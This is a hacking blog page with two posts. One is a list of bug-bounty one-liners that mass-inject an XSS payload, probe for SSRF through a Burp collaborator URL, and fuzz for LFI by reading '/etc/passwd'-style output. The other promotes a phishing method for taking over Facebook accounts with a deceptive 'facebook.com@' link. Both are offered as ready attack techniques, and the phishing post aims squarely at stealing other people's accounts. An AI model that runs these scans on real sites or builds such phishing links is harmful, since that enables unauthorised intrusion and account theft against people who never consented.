Posts

Showing posts from April 13, 2021

Bug BOunty Helpful Commands

  cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done >>. to get urls from websites.... waybackurls target.com | tee urlss.txt dalfox file urlss.txt pipe   XSS   cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done SSRF findomain -t example.com -q | httpx -silent -threads 1000 | gau |  grep “=” | qsreplace http://YOUR.burpcollaborator.net LFI Follow this command to find LFI findomain -t example.com -q |  waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt ; done find JS files on target.com https:/...

How to Hack Facebook Account New Method 2021 || Advanced Phishing Attack

Image
 How to Hack Facebook Account New Method 2021 || Advanced Phishing Attack  In this article, I am going to show you that how hackers hacked Facebook Account by Advanced Phishing Attack? There is a lot of phishing tricks but these links are block by some official sites. For the Hacking Facebook i create my own scripts for advanced phishing attack on facebook.   My  phishing method will like be Facebook Official link i.e e.g https://www.facebook.com@verify?yxay...... This link is so Awaesome and can't believe someone that it is fake..... so lets start...... In my case  i  perform this attack in Kali Linux. Requirements :  1. Port Forwarding      or 2. Any web Host  so please follow this Video ........ Video link ..........  https://youtu.be/mOAhtsMGwik

Popular posts from this blog

Very Huge Dorks for SQLi || Web Hacking

How to find index of the Array in C